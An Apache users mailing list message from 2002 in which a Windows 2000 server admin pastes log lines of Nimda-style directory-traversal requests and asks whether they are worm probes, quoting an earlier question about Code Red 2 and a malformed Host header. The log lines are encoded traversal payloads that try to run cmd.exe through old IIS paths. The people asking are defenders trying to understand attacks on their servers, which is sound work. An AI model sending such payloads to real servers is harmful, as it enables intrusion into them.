httpd-users mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From "Alex \"Sniper\" Togstad" <sni...@3dretreat.com>
Subject Re: Code Red 2 attack
Date Thu, 28 Feb 2002 22:48:57 GMT
I have kinda the same questions...

Here is a snippet from my log:

12.224.157.6 - - [05/Feb/2002:02:59:08 -0800] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
12.224.157.6 - - [05/Feb/2002:02:59:10 -0800] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
12.224.157.6 - - [05/Feb/2002:02:59:13 -0800] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
12.224.157.6 - - [05/Feb/2002:02:59:16 -0800] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
12.224.157.6 - - [05/Feb/2002:02:59:18 -0800] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286
12.224.157.6 - - [05/Feb/2002:02:59:21 -0800] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286
12.224.157.6 - - [05/Feb/2002:02:59:23 -0800] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
12.224.157.6 - - [05/Feb/2002:02:59:26 -0800] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303

Thats just Nimda attempts correct?

Apache 1.3.23 on Win2k

Thanx!


----- Original Message -----
From: "Eduardo Gomez" <innerlab@yahoo.com>
To: <users@httpd.apache.org>
Sent: Thursday, February 28, 2002 2:39 PM
Subject: Code Red 2 attack


> Hello:
>
> Im using apache on Windows 2000.
>
> In my apache error log I've found several entries which
> (as far as I know) belong to Nimda and Red Code 2.
> However, there's one that begins with about 15k of binary code
> and ends with:
>
> [Mon Feb 11 20:30:11 2002] [error] [client 61.152.254.1] Client sent
> malformed Host header
>
> Does this mean someone may have successfully hacked me through this
> malformed header attack?
> Is it normal to find so much binary code in the error log?
>
>
>
>
>
>
> ---------------------------------------------------------------------
> The official User-To-User support forum of the Apache HTTP Server Project.
> See <URL:http://httpd.apache.org/userslist.html> for more info.
> To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
> For additional commands, e-mail: users-help@httpd.apache.org
>
>



---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org


Mime
View raw message